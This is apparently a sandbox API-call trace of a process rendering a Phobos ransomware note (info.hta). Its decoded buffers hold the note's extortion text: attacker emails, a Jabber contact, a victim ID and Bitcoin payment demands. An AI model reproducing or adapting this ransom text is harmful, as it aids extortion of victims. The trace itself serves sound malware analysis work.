CreateUri (in: pwzURI="https://localbitcoins.com/buy_bitcoins", dwFlags=0x2b81, dwReserved=0x0, ppURI=0x14e3ac | out: ppURI=0x14e3ac*=0x53db74) returned 0x0 [0230.607] ParseURLW (in: pcszURL="file:///C:/users/public/desktop/info.hta", ppu=0x14e2c0 | out: ppu=0x14e2c0) returned 0x0 [0230.607] CreateUri (in: pwzURI="file:///C:/users/public/desktop/info.hta", dwFlags=0x2b85, dwReserved=0x0, ppURI=0x14e37c | out: ppURI=0x14e37c*=0x53c4ac) returned 0x0 [0230.607] IUnknown:QueryInterface (in: This=0x53c4ac, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x14e344 | out: ppvObject=0x14e344*=0x53c4ac) returned 0x0 [0230.608] IUnknown:Release (This=0x53c4ac) returned 0xd [0230.608] IUnknown:AddRef (This=0x53c4ac) returned 0xe [0230.608] CoInternetCombineIUri (in: pBaseUri=0x53c4ac, pRelativeUri=0x53db74, dwCombineFlags=0x6000000, ppCombinedUri=0x14e3b0, dwReserved=0x0 | out: ppCombinedUri=0x14e3b0*=0x53db74) returned 0x0 [0230.608] IUnknown:Release (This=0x53c4ac) returned 0xe [0230.608] IUnknown:Release (This=0x53c4ac) returned 0xd [0230.723] CoCreateInstance (in: rclsid=0x74102bc0*(Data1=0x3c374a40, Data2=0xbae4, Data3=0x11cf, Data4=([0]=0xbf, [1]=0x7d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x69, [6]=0x46, [7]=0xee)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x74093cb0*(Data1=0x3c374a41, Data2=0xbae4, Data3=0x11cf, Data4=([0]=0xbf, [1]=0x7d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x69, [6]=0x46, [7]=0xee)), ppv=0x542624 | out: ppv=0x542624*=0x5a5500) returned 0x0 [0231.022] IUnknown:QueryInterface (in: This=0x5a5500, riid=0x74157ac0*(Data1=0xcd040b2, Data2=0x39ba, Data3=0x4cdf, Data4=([0]=0x96, [1]=0xcf, [2]=0xc1, [3]=0x92, [4]=0x9d, [5]=0x3b, [6]=0x98, [7]=0x98)), ppvObject=0x14e3bc | out: ppvObject=0x14e3bc*=0x5a5500) returned 0x0 [0231.939] IUnknown:Release (This=0x5a5500) returned 0x2 [0231.940] IUnknown:Release (This=0x53db74) returned 0x4 [0231.940] IUnknown:Release (This=0x53db74) returned 0x3 [0231.940] IsOS (dwOS=0x25) returned 1 [0231.940] GetSysColor (nIndex=26) returned 0xcc6600 [0231.940] LsSetDoc () returned 0x0 [0231.940] LsCreateLine () returned 0x0 [0231.940] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0231.941] LsQueryLineDup () returned 0x0 [0231.941] LsDestroyLine () returned 0x0 [0231.941] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0231.941] LsSetDoc () returned 0x0 [0231.941] LsCreateLine () returned 0x0 [0231.941] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0231.942] LsQueryLineDup () returned 0x0 [0231.942] LsDestroyLine () returned 0x0 [0231.942] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0231.942] CreateUri (in: pwzURI="http://www.coindesk.com/information/how-can-i-buy-bitcoins/", dwFlags=0x2b81, dwReserved=0x0, ppURI=0x14e3ac | out: ppURI=0x14e3ac*=0x5a88b4) returned 0x0 [0231.942] ParseURLW (in: pcszURL="file:///C:/users/public/desktop/info.hta", ppu=0x14e2c0 | out: ppu=0x14e2c0) returned 0x0 [0231.942] CreateUri (in: pwzURI="file:///C:/users/public/desktop/info.hta", dwFlags=0x2b85, dwReserved=0x0, ppURI=0x14e37c | out: ppURI=0x14e37c*=0x53c4ac) returned 0x0 [0231.942] IUnknown:QueryInterface (in: This=0x53c4ac, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x14e344 | out: ppvObject=0x14e344*=0x53c4ac) returned 0x0 [0231.943] IUnknown:Release (This=0x53c4ac) returned 0xe [0231.943] IUnknown:AddRef (This=0x53c4ac) returned 0xf [0231.943] CoInternetCombineIUri (in: pBaseUri=0x53c4ac, pRelativeUri=0x5a88b4, dwCombineFlags=0x6000000, ppCombinedUri=0x14e3b0, dwReserved=0x0 | out: ppCombinedUri=0x14e3b0*=0x5a88b4) returned 0x0 [0231.943] IUnknown:Release (This=0x53c4ac) returned 0xf [0231.943] IUnknown:Release (This=0x53c4ac) returned 0xe [0231.943] IUnknown:QueryInterface (in: This=0x5a5500, riid=0x74157ac0*(Data1=0xcd040b2, Data2=0x39ba, Data3=0x4cdf, Data4=([0]=0x96, [1]=0xcf, [2]=0xc1, [3]=0x92, [4]=0x9d, [5]=0x3b, [6]=0x98, [7]=0x98)), ppvObject=0x14e3bc | out: ppvObject=0x14e3bc*=0x5a5500) returned 0x0 [0231.943] IUnknown:Release (This=0x5a5500) returned 0x2 [0231.943] IUnknown:Release (This=0x5a88b4) returned 0x4 [0231.943] IUnknown:Release (This=0x5a88b4) returned 0x3 [0231.943] IsOS (dwOS=0x25) returned 1 [0231.943] GetSysColor (nIndex=26) returned 0xcc6600 [0231.943] LsSetDoc () returned 0x0 [0231.943] LsCreateLine () returned 0x0 [0231.943] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0231.945] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x2e4) returned 0x5ab190 [0231.945] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x194) returned 0x5a3950 [0231.945] LsQueryLineDup () returned 0x0 [0231.945] LsDestroyLine () returned 0x0 [0231.945] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0231.945] LsSetDoc () returned 0x0 [0231.945] LsCreateLine () returned 0x0 [0231.945] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0231.946] LsQueryLineDup () returned 0x0 [0231.946] LsDestroyLine () returned 0x0 [0231.946] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0231.946] LsSetDoc () returned 0x0 [0231.946] LsCreateLine () returned 0x0 [0231.946] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0231.946] LsQueryLineDup () returned 0x0 [0231.946] LsDestroyLine () returned 0x0 [0231.947] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0232.189] GetOutlineTextMetricsW (in: hdc=0x6e010778, cjCopy=0xd8, potm=0x14e288 | out: potm=0x14e288) returned 0xd8 [0232.376] SelectObject (hdc=0x6e010778, h=0x18a002e) returned 0x30a0729 [0232.376] SelectObject (hdc=0x6e010778, h=0x30a0729) returned 0x18a002e [0232.376] GetTextFaceW (in: hdc=0x6e010778, c=32, lpName=0x14e4d8 | out: lpName="Wingdings") returned 10 [0232.376] SelectObject (hdc=0x6e010778, h=0x18a002e) returned 0x30a0729 [0232.472] LsSetDoc () returned 0x0 [0232.472] LsCreateLine () returned 0x0 [0232.472] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0232.473] LsQueryLineDup () returned 0x0 [0232.473] LsDestroyLine () returned 0x0 [0232.473] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0232.473] LsSetDoc () returned 0x0 [0232.473] LsCreateLine () returned 0x0 [0232.473] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0232.474] LsQueryLineDup () returned 0x0 [0232.474] LsDestroyLine () returned 0x0 [0232.474] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0232.474] LsSetDoc () returned 0x0 [0232.474] LsCreateLine () returned 0x0 [0232.474] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0232.474] LsQueryLineDup () returned 0x0 [0232.474] LsDestroyLine () returned 0x0 [0232.474] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0232.475] LsSetDoc () returned 0x0 [0232.475] LsCreateLine () returned 0x0 [0232.475] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0232.475] LsQueryLineDup () returned 0x0 [0232.475] LsDestroyLine () returned 0x0 [0232.475] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0232.475] LsSetDoc () returned 0x0 [0232.475] LsCreateLine () returned 0x0 [0232.475] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0232.476] LsQueryLineDup () returned 0x0 [0232.476] LsDestroyLine () returned 0x0 [0232.476] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0232.476] LsSetDoc () returned 0x0 [0232.476] LsCreateLine () returned 0x0 [0232.476] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0232.478] LsQueryLineDup () returned 0x0 [0232.478] LsDestroyLine () returned 0x0 [0232.478] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0232.478] LsSetDoc () returned 0x0 [0232.478] LsCreateLine () returned 0x0 [0232.478] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0232.478] LsQueryLineDup () returned 0x0 [0232.478] LsDestroyLine () returned 0x0 [0232.478] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0232.478] LsSetDoc () returned 0x0 [0232.478] LsCreateLine () returned 0x0 [0232.478] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0232.479] LsQueryLineDup () returned 0x0 [0232.479] LsDestroyLine () returned 0x0 [0232.479] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0232.480] LsSetDoc () returned 0x0 [0232.480] LsCreateLine () returned 0x0 [0232.480] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0232.480] LsQueryLineDup () returned 0x0 [0232.480] LsDestroyLine () returned 0x0 [0232.480] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0232.480] LsSetDoc () returned 0x0 [0232.480] LsCreateLine () returned 0x0 [0232.480] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0232.481] LsQueryLineDup () returned 0x0 [0232.482] LsDestroyLine () returned 0x0 [0232.482] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0232.482] LsSetDoc () returned 0x0 [0232.482] LsCreateLine () returned 0x0 [0232.482] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0232.482] LsQueryLineDup () returned 0x0 [0232.482] LsDestroyLine () returned 0x0 [0232.482] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0232.482] LsSetDoc () returned 0x0 [0232.482] LsCreateLine () returned 0x0 [0232.482] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0232.483] LsQueryLineDup () returned 0x0 [0232.483] LsDestroyLine () returned 0x0 [0232.483] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0232.483] LsSetDoc () returned 0x0 [0232.483] LsCreateLine () returned 0x0 [0232.483] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0232.484] LsQueryLineDup () returned 0x0 [0232.484] LsDestroyLine () returned 0x0 [0232.484] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0232.484] LsSetDoc () returned 0x0 [0232.484] LsCreateLine () returned 0x0 [0232.484] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0232.485] CreateUri (in: pwzURI="https://www.youtube.com/results?search_query=pidgin+jabber+install", dwFlags=0x2b81, dwReserved=0x0, ppURI=0x14dfac | out: ppURI=0x14dfac*=0x5a898c) returned 0x0 [0232.485] ParseURLW (in: pcszURL="file:///C:/users/public/desktop/info.hta", ppu=0x14dec0 | out: ppu=0x14dec0) returned 0x0 [0232.485] CreateUri (in: pwzURI="file:///C:/users/public/desktop/info.hta", dwFlags=0x2b85, dwReserved=0x0, ppURI=0x14df7c | out: ppURI=0x14df7c*=0x53c4ac) returned 0x0 [0232.485] IUnknown:QueryInterface (in: This=0x53c4ac, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x14df44 | out: ppvObject=0x14df44*=0x53c4ac) returned 0x0 [0232.485] IUnknown:Release (This=0x53c4ac) returned 0xf [0232.485] IUnknown:AddRef (This=0x53c4ac) returned 0x10 [0232.485] CoInternetCombineIUri (in: pBaseUri=0x53c4ac, pRelativeUri=0x5a898c, dwCombineFlags=0x6000000, ppCombinedUri=0x14dfb0, dwReserved=0x0 | out: ppCombinedUri=0x14dfb0*=0x5a898c) returned 0x0 [0232.485] IUnknown:Release (This=0x53c4ac) returned 0x10 [0232.485] IUnknown:Release (This=0x53c4ac) returned 0xf [0232.485] IUnknown:QueryInterface (in: This=0x5a5500, riid=0x74157ac0*(Data1=0xcd040b2, Data2=0x39ba, Data3=0x4cdf, Data4=([0]=0x96, [1]=0xcf, [2]=0xc1, [3]=0x92, [4]=0x9d, [5]=0x3b, [6]=0x98, [7]=0x98)), ppvObject=0x14dfbc | out: ppvObject=0x14dfbc*=0x5a5500) returned 0x0 [0232.486] IUnknown:Release (This=0x5a5500) returned 0x2 [0232.486] IUnknown:Release (This=0x5a898c) returned 0x4 [0232.486] IUnknown:Release (This=0x5a898c) returned 0x3 [0232.486] IsOS (dwOS=0x25) returned 1 [0232.486] GetSysColor (nIndex=26) returned 0xcc6600 [0232.486] LsQueryLineDup () returned 0x0 [0232.486] LsDestroyLine () returned 0x0 [0232.486] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0232.486] LsSetDoc () returned 0x0 [0232.486] LsCreateLine () returned 0x0 [0232.486] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0232.487] LsQueryLineDup () returned 0x0 [0232.487] LsDestroyLine () returned 0x0 [0232.487] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0232.487] LsSetDoc () returned 0x0 [0232.487] LsCreateLine () returned 0x0 [0232.487] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0232.487] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x18) returned 0x585b60 [0232.487] LsSetDoc () returned 0x0 [0232.487] LsCreateLine () returned 0x0 [0232.487] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0232.487] LsQueryLineDup () returned 0x0 [0232.488] LsDestroyLine () returned 0x0 [0232.488] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0232.488] LsdnFinishRegular () returned 0x0 [0232.488] LsQueryLineDup () returned 0x0 [0232.488] LsQueryLineCpPpoint () returned 0x0 [0232.488] LsDestroyLine () returned 0x0 [0232.488] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x585b60 | out: hHeap=0x510000) returned 1 [0232.488] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0232.488] LsSetDoc () returned 0x0 [0232.488] LsCreateLine () returned 0x0 [0232.488] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0232.489] LsQueryLineDup () returned 0x0 [0232.489] LsDestroyLine () returned 0x0 [0232.489] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0232.489] LsSetDoc () returned 0x0 [0232.489] LsCreateLine () returned 0x0 [0232.489] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0232.490] LsQueryLineDup () returned 0x0 [0232.490] LsDestroyLine () returned 0x0 [0232.490] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0232.490] LsSetDoc () returned 0x0 [0232.490] LsCreateLine () returned 0x0 [0232.490] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0232.490] LsQueryLineDup () returned 0x0 [0232.490] LsDestroyLine () returned 0x0 [0232.490] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0232.491] LsSetDoc () returned 0x0 [0232.491] LsCreateLine () returned 0x0 [0232.491] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0232.491] LsQueryLineDup () returned 0x0 [0232.491] LsDestroyLine () returned 0x0 [0232.491] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0232.491] LsSetDoc () returned 0x0 [0232.491] LsCreateLine () returned 0x0 [0232.491] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0232.491] LsQueryLineDup () returned 0x0 Thread: id = 224 os_tid = 0x710 Thread: id = 244 os_tid = 0x5bc [0224.446] GetCurrentThreadId () returned 0x5bc [0224.446] LoadLibraryW (lpLibFileName="mshtml.dll") returned 0x73f40000 [0224.446] CoInitialize (pvReserved=0x0) returned 0x0 [0224.446] GetTickCount () returned 0x201e3 [0224.447] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x1006) returned 0x556800 [0224.447] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x555e68 | out: hHeap=0x510000) returned 1 [0224.447] IInternetProtocol:Read (in: This=0x555258, pv=0x5568c8, cb=0xf38, pcbRead=0x252f73c | out: pv=0x5568c8, pcbRead=0x252f73c*=0xf38) returned 0x0 [0224.447] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x2006) returned 0x557810 [0224.447] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x556800, cbMultiByte=4096, lpWideCharStr=0x557814, cchWideChar=4096 | out: lpWideCharStr="\r\n\r\n \r\n \r\n phobos\r\n\r\n \r\n\r\n \r\n\r\n \r\n \r\n\r\n \r\n
    \r\n\x09\x09\r\n\x09\x09
    All your files have been encrypted!
    \r\n\x09
    \r\n
    All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail tedmundboardus@aol.com
    \x09
    Write this ID in the title of your message 9C354B42-0001
    \r\n\x09
    In case of no answer in 24 hours write us to this e-mail:tylecotebenji@aol.com
    \r\n\x09
    If there is no response from our mail, you can install the Jabber client and write to us in support of phobos_helper@xmpp.jp
    \r\n
    \r\n\x09\x09You have to pay for decryption in Bitcoins. The price d") returned 4096 [0224.447] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x108) returned 0x559820 [0224.705] CoInitialize (pvReserved=0x0) returned 0x1 [0224.705] CoCreateInstance (in: rclsid=0x74090e58*(Data1=0x275c23e2, Data2=0x3747, Data3=0x11d0, Data4=([0]=0x9f, [1]=0xea, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3f, [6]=0x86, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x74090e48*(Data1=0xdccfc164, Data2=0x2b38, Data3=0x11d2, Data4=([0]=0xb7, [1]=0xec, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x8f, [6]=0x5d, [7]=0x9a)), ppv=0x74479500 | out: ppv=0x74479500*=0x54f828) returned 0x0 [0225.376] IUnknown:QueryInterface (in: This=0x54f828, riid=0x74091170*(Data1=0x359f3441, Data2=0xbd4a, Data3=0x11d0, Data4=([0]=0xb1, [1]=0x88, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x38, [6]=0xc9, [7]=0x69)), ppvObject=0x74479504 | out: ppvObject=0x74479504*=0x5546d0) returned 0x0 [0225.377] IUnknown:QueryInterface (in: This=0x54f828, riid=0x74091180*(Data1=0xdccfc162, Data2=0x2b38, Data3=0x11d2, Data4=([0]=0xb7, [1]=0xec, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x8f, [6]=0x5d, [7]=0x9a)), ppvObject=0x74479508 | out: ppvObject=0x74479508*=0x55dbd8) returned 0x0 [0225.470] CoUninitialize () [0225.470] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76180000 [0225.470] GetProcAddress (hModule=0x76180000, lpProcName="GetThreadUILanguage") returned 0x761bcf14 [0225.471] GetThreadUILanguage () returned 0x2520409 [0225.471] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x15a54) returned 0x56b7e0 [0225.912] RtlReAllocateHeap (Heap=0x510000, Flags=0x0, Ptr=0x56b7e0, Size=0x52ac) returned 0x56b7e0 [0225.915] GetCPInfo (in: CodePage=0x4e3, lpCPInfo=0x252f6a0 | out: lpCPInfo=0x252f6a0) returned 1 [0225.915] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x68) returned 0x5843e8 [0225.915] IUnknown:AddRef (This=0x53c14c) returned 0xe [0225.915] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x1a8) returned 0x584458 [0225.915] GetCPInfo (in: CodePage=0x4e3, lpCPInfo=0x252f684 | out: lpCPInfo=0x252f684) returned 1 [0225.915] IUnknown:AddRef (This=0x545750) returned 0x4 [0225.915] IUnknown:AddRef (This=0x53c14c) returned 0xf [0225.915] IUnknown:QueryInterface (in: This=0x53c14c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x252f68c | out: ppvObject=0x252f68c*=0x53c14c) returned 0x0 [0225.916] IUnknown:Release (This=0x53c14c) returned 0xf [0225.916] IUnknown:AddRef (This=0x53c14c) returned 0x10 [0225.916] IUri:GetScheme (in: This=0x53c14c, pdwScheme=0x252f690 | out: pdwScheme=0x252f690*=0x9) returned 0x0 [0225.916] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x8006) returned 0x570a98 [0225.916] IUnknown:Release (This=0x53c14c) returned 0xf [0225.916] PostMessageW (hWnd=0x2019a, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1 [0225.916] GetTickCount () returned 0x20656 [0225.916] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x1006) returned 0x578aa8 [0225.916] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x4000) returned 0x579ab8 [0225.916] IInternetProtocol:Read (in: This=0x555258, pv=0x579ac4, cb=0x1000, pcbRead=0x252f73c | out: pv=0x579ac4, pcbRead=0x252f73c*=0x1000) returned 0x0 [0225.924] RtlReAllocateHeap (Heap=0x510000, Flags=0x0, Ptr=0x570a98, Size=0x3ee8) returned 0x570a98 [0225.924] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x578aa8, cbMultiByte=4096, lpWideCharStr=0x57297e, cchWideChar=4096 | out: lpWideCharStr="epends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files.\r\n\x09
    \r\n\x09\r\n\x09
    \r\n
    Free decryption as guarantee
    \r\n\x09\x09
      Before paying you can send us up to 5 files for free decryption. The total size of files must be less than 10Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)\x09
    \r\n
    \r\n\r\n
    \r\n
    How to obtain Bitcoins
    \r\n \r\n
    \r\n\x09
    Jabber client installation instructions:
    \r\n\x09
    \r\n\x09\x09
      \r\n\x09\x09\x09
    • Download the jabber (Pidgin) client from https://pidgin.im/download/windows/
      • \r\n\x09\x09\x09
    • After installation, the Pidgin client will prompt you to create a new account.
      • \r\n\x09\x09\x09
    • Click \"Add\"
    • In the \"Protocol\" field, select XMPP
      • \r\n\x09\x09\x09
    • In \"Username\" - come up with any name
      • \r\n\x09\x09\x09
    • In the field \"domain\" - enter any jabber-server, there are a lot of them, for example - exploit.im
      • \r\n\x09\x09\x09
    • Create a password
    • At the bottom, put a tick \"Create account\"
      • \r\n\x09\x09\x09
    • Click add
      • \r\n\x09\x09\x09
    • If you selected \"domain\" - exploit.im, then a new window should appear in which you will need to re-enter your data:
      • \r\n\x09\x09\x09
        \r\n\x09\x09\x09\x09
      • User
        • \r\n\x09\x09\x09\x09
      • password
        • \r\n\x09\x09\x09\x09
      • You will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below)
        • \r\n\x09\x09\x09
      \r\n\x09\x09\x09
    • If you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install
      • \r\n\x09\x09
    \r\n\x09
    \r\n
    \r\n
    Attention!
    \r\n
      \r\n
    • Do not rename encrypted files.
      • \r\n
    • Do not try to decrypt your data using third party software, it may cause permanent data loss.
      • \r\n
    • Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.
      • \r\n
    \r\n
    \r\n\x09
    \r\n\x09\x09\r\n\x09
    \r\n
  • In the \"Protocol\" field, select XMPP
    • \r\n\x09\x09\x09
  • In \"Username\" - come up with any name
    • \r\n\x09\x09\x09
  • In the field \"domain\" - enter any jabber-server, there are a lot of them, for example - exploit.im
    • \r\n\x09\x09\x09
  • Create a password
  • At the bottom, put a tick \"Create account\"
    • \r\n\x09\x09\x09
  • Click add
    • \r\n\x09\x09\x09
  • If you selected \"domain\" - exploit.im, then a new window should appear in which you will need to re-enter your data:
    • \r\n\x09\x09\x09
      \r\n\x09\x09\x09\x09
    • User
      • \r\n\x09\x09\x09\x09
    • password
      • \r\n\x09\x09\x09\x09
    • You will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below)
      • \r\n\x09\x09\x09
    \r\n\x09\x09\x09
  • If you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install
    • \r\n\x09\x09\r\n\x09
    \r\n
    \r\n
    Attention!
    \r\n
      \r\n
    • Do not rename encrypted files.
      • \r\n
    • Do not try to decrypt your data using third party software, it may cause permanent data loss.
      • \r\n
    • Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.
      • \r\n
    \r\n
    \r\n\x09
    \r\n\x09\x09\r\n\x09
